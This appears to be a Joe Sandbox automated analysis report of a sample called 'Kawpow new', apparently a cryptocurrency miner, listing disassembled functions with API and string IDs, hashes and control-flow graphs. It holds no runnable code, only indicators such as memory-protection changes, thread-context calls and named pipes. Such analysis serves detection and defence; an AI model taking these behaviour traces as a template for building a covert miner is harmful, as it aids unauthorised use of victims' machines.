                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction ID: ea549e61dd8eef3cc77149adb4771f300c504a009f75e0aa9006d7146f94dc58
                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                          • Instruction Fuzzy Hash: A0E1E3726087828EEF60DF25D46839E77A8F74DB89F214146EE8D47B65CB34D890C722
                          Function 0000027E8247F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 641 27e8247f394-27e8247f3e6 642 27e8247f4d7 641->642 643 27e8247f3ec-27e8247f3ef 641->643 646 27e8247f4d9-27e8247f4f5 642->646 644 27e8247f3f9-27e8247f3fc 643->644 645 27e8247f3f1-27e8247f3f4 643->645 647 27e8247f4bc-27e8247f4cf 644->647 648 27e8247f402-27e8247f411 644->648 645->646 647->642 649 27e8247f421-27e8247f440 LoadLibraryExW 648->649 650 27e8247f413-27e8247f416 648->650 653 27e8247f4f6-27e8247f50b 649->653 654 27e8247f446-27e8247f44f GetLastError 649->654 651 27e8247f516-27e8247f525 GetProcAddress 650->651 652 27e8247f41c 650->652 657 27e8247f527-27e8247f54e 651->657 658 27e8247f4b5 651->658 655 27e8247f4a8-27e8247f4af 652->655 653->651 656 27e8247f50d-27e8247f510 FreeLibrary 653->656 659 27e8247f496-27e8247f4a0 654->659 660 27e8247f451-27e8247f468 call 27e8247c928 654->660 655->648 655->658 656->651 657->646 658->647 659->655 660->659 663 27e8247f46a-27e8247f47e call 27e8247c928 660->663 663->659 666 27e8247f480-27e8247f494 LoadLibraryExW 663->666 666->653 666->659
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: AddressFreeLibraryProc
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3013587201-537541572
                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                          • Instruction ID: f51ce8003fd60c6985a796fbef00ca5ce497e9b1a938781a1733ed6547d4492f
                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                          • Instruction Fuzzy Hash: 38410622329A0896EE16CB16A80875723D9F75DBA0F0F41759D2E977E5EE3CCC458332
                          Function 0000027E8247104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 667 27e8247104c-27e824710b9 RegQueryInfoKeyW 668 27e824711b5-27e824711d0 667->668 669 27e824710bf-27e824710c9 667->669 669->668 670 27e824710cf-27e8247111f RegEnumValueW 669->670 671 27e824711a5-27e824711af 670->671 672 27e82471125-27e8247112a 670->672 671->668 671->670 672->671 673 27e8247112c-27e82471135 672->673 674 27e82471147-27e8247114c 673->674 675 27e82471137 673->675 677 27e8247114e-27e82471193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 674->677 678 27e82471199-27e824711a3 674->678 676 27e8247113b-27e8247113f 675->676 676->671 679 27e82471141-27e82471145 676->679 677->678 678->671 679->674 679->676
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          • API String ID: 3743429067-2564639436
                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                          • Instruction ID: 46868de19e64390b1342488d1c40d1ac490e832497282edde8a2cdcd4e8608ae
                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                          • Instruction Fuzzy Hash: 58418333614B84CAEB61CF21E44879B77A5F38CB88F088115DA9E0B768DF38C845CB21
                          Function 0000027E8247D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • FlsGetValue.KERNEL32(?,?,?,0000027E8247C7DE,?,?,?,?,?,?,?,?,0000027E8247CF9D,?,?,00000001), ref: 0000027E8247D087
                          • FlsSetValue.KERNEL32(?,?,?,0000027E8247C7DE,?,?,?,?,?,?,?,?,0000027E8247CF9D,?,?,00000001), ref: 0000027E8247D0A6
                          • FlsSetValue.KERNEL32(?,?,?,0000027E8247C7DE,?,?,?,?,?,?,?,?,0000027E8247CF9D,?,?,00000001), ref: 0000027E8247D0CE
                          • FlsSetValue.KERNEL32(?,?,?,0000027E8247C7DE,?,?,?,?,?,?,?,?,0000027E8247CF9D,?,?,00000001), ref: 0000027E8247D0DF
                          • FlsSetValue.KERNEL32(?,?,?,0000027E8247C7DE,?,?,?,?,?,?,?,?,0000027E8247CF9D,?,?,00000001), ref: 0000027E8247D0F0
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Value
                          • String ID: 1%$Y%
                          • API String ID: 3702945584-1395475152
                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                          • Instruction ID: a0a4bd4a9a3a126293e5fcd1e44bd794fb686e9caae2016a805d626971f348f8
                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                          • Instruction Fuzzy Hash: 2611D32031C28C89FE685735955D32B21499B4C7F0F1E57A4A83E167FADF2ACC028A32
                          Function 0000027E82477510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 190073905-0
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: 85d14b5ce1170814f116d264cc1d671d96cd4ef0ac6e0d2e00dff1ea35947868
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: AC81E52060E7095EFF509B29984835B229CA74DB80FBF44A5992D577B6DB38CC45C733
                          Function 0000027E82479DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                          • Instruction ID: 7ac029ff9104a3e757eb1555a1f151cf6447563269221e35a56d8629204bff3e
                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                          • Instruction Fuzzy Hash: 3E31C43121AA44A9EE62DB06A508766239CF74CBA0F5F09659D3D4B3E1DF38C8458732
                          Function 0000027E82483DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                          • Instruction ID: 85771f7f7506cc7abf9c456a07ee6b88b8ab163ba1322cce65719d2cc73cb04d
                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                          • Instruction Fuzzy Hash: 35116621728B4086EB508B52E85832666A8F78CFE4F194254ED6E977B5CF38CC14C765
                          Function 0000027E82473790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID: wr
                          • API String ID: 1092925422-2678910430
                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction ID: 760b34f18aff27506b38a17b131c07975f5aa5e40aae9b182d44afd125cb8597
                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction Fuzzy Hash: FA11CE26718B4086EF549B15E00822A67A8F74CB80F0A4168DEAD07764EF3DC904C725
                          Function 0000027E82475B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                          • Instruction ID: ca057b8e87035d885d0b5c76f44d0cf1c90f5f7cc1cdeb4e43703aa21b1808df
                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                          • Instruction Fuzzy Hash: 14D1B776209B8886DE709B0AE49835B77A4F38CB84F550156EE9E47BB5CF3CC941CB21
                          Function 0000027E82472F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: dialer
                          • API String ID: 756756679-3528709123
                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                          • Instruction ID: c0eaa3c0378b0a4676cf3252683d1a4cf67495ee04aa8f1044a485ed5136ed58
                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                          • Instruction Fuzzy Hash: 4F31A022709B5986EE51CF16A54872B67A8FB48B84F0E80619E5D07B65EB34CC618731
                          Function 0000027E8247CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Value$ErrorLast
                          • String ID:
                          • API String ID: 2506987500-0
                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                          • Instruction ID: 15e84eea571a6569cdb3297f5b8af2f52b5b34861a8dcc622727a6bf1b9f1103
                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                          • Instruction Fuzzy Hash: 2411752021C68889FE649735955D72B114A9B4C7F4F1F1794AC3F577FADE298C028632
                          Function 0000027E8247199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          • API String ID: 517849248-0
                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                          • Instruction ID: 340c66f2abfb511757de52f8c02a32c8358d8597c78b9784b9376fbdf383ec2d
                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                          • Instruction Fuzzy Hash: 10018721718A4086EE90DB12A84C75A63AAF78CBC0F894075DE6E53765DF38C989C731
                          Function 0000027E824736C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          • API String ID: 449555515-0
                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                          • Instruction ID: 37b8b8d4942877810276d20b4c6505214c29f2c6d25351851db2017f0af07fe2
                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                          • Instruction Fuzzy Hash: 2701AD2422AB0486EF64DB25E80C31763A8BB4DB82F0940A5CD6D17371EF3CC808CB32
                          Function 0000027E82479005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 2395640692-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: d320389ff1473aef7197522de0cbb1c732e2f146618a6140aa97fff1bdcdcd3a
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: BA51D3323192048EEF55CB15E44CB5A37AEF348B98F1A85A4DA2E477A8DB35CC50C732
                          Function 0000027E82478FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 2395640692-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: 389b28a30f08270f4db65a512fd394a0b983e66272f470b56b8000b97d759a68
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: BB31D3322186549AEF10DF15E84C71A37A9F348B88F0A8494EE6E07765DB39CD40C736
                          Function 0000027E82471A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          • API String ID: 2719912262-4282027825
                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                          • Instruction ID: 1445761c416837469800c74d39d94992e18f3c4f03bd59e78e857a5fb28a8a32
                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                          • Instruction Fuzzy Hash: D2F0A42231864482EF708F20F88875B6368F74CB88F894061CA5D46968DF7CCA4DCB31
                          Function 0000027E8247BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                          • Instruction ID: b0898f34afa80fb3da0b1845de999e96c142b01d9feb912c10886c389432ea75
                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                          • Instruction Fuzzy Hash: 23F06261229B0485EF108F24E45C36B6364EB8DB71F594299CA7E591F4DF2CC9498731
                          Function 0000027E82473044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          • API String ID: 3422762182-91387939
                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                          • Instruction ID: dd8ca9ad19d192c60e398a5f4d12f2331c03ade3fd6d3dfbc97bd29f5df517e1
                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                          • Instruction Fuzzy Hash: D8F05E24628B8482EE408B56B90811A6668AB4CFC0F0D8060EE6E17B28DF68C8458731
                          Function 0000027E824750D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                          • Instruction ID: adb762ff600620127f88250a0bfcf225fee2b6cde49f655231d376bd16a9f0a7
                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                          • Instruction Fuzzy Hash: 5902C83261DB848AEF60CB55E49435BB7A4F3C8794F150055EA9E8BBA8DF7CC844CB21
                          Function 0000027E82475710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                          • Instruction ID: f8ab940eac013dfb1372cb0400e75f86d9130a933e34762150a6bb4dac62b407
                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                          • Instruction Fuzzy Hash: 7661B93651DB88CAEF608B15E44831B77A8F38C794F560156EA9E47BB8DB7CC850CB21
                          Function 0000027E82484104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: 7a636a94bd693e2dd5c119516f8678fc2afad9f43fb05dd7f4b415a8fd5bdda4
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: 3A119136A3CA9011FE661569D45D37711486B6C3B8F0F06A4A97E36BF68B28CC415232
                          Function 0000027E82333504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          • API String ID: 1156100317-0
                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction ID: 7cc12534f95d05cc2d46c02f76ce01ecfeda7169004729fea027e83a0758231e
                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                          • Instruction Fuzzy Hash: 3A11EB6361CA0305FE541118F47D3671088AB5CB70F4BC6ACB96E0A2F6C624CF4042A3
                          Function 0000027E8232F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                          • API String ID: 3215553584-4202648911
                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction ID: 13a42f2f6befb9d6478211def2324680c5e33699a3c8552b0d2852b901ddbb96
                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                          • Instruction Fuzzy Hash: 9F61E37660C2164AFE659B25E57C32B26A8E75D742F834495CA0E137FCDA34DC428333
                          Function 0000027E8247AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: bd52c99d913391ad94a13eaa876bd6232107cd9e8b0031c306a36dca8e98eb07
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 7E617A33608B888AEF10DF65D44439E77A4F348B88F094255EF6D17BA8DBB8C995C721
                          Function 0000027E8247AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction ID: 85be8d71e6d2514d3f56010550cfea0398cf361631401c43bdaedd0a9950a0ca
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: D651B2731083988EEF748F21948835A77A9F358B84F1E4155EAAD47BE5CBB8D850C732
                          Function 0000027E8232A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction ID: 5877f3e63d16b976b45ef95200a4147caf0081c84c84ecddf9a0809085c2c30a
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: 9F51EE32108382CFEF648B11D56835A77A8F358B96F1A8156DB8D83BE6CB38D851C712
                          Function 0000027E82328405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: 4f11b148c0c42fce731922f0d68e1fe2f5b56187b8c443f5290107562df1d33d
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: C15191327097028FEF14CB15E458B1A379EF358B99F6281A4DA0E437A8EB34CD418736
                          Function 0000027E823283E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
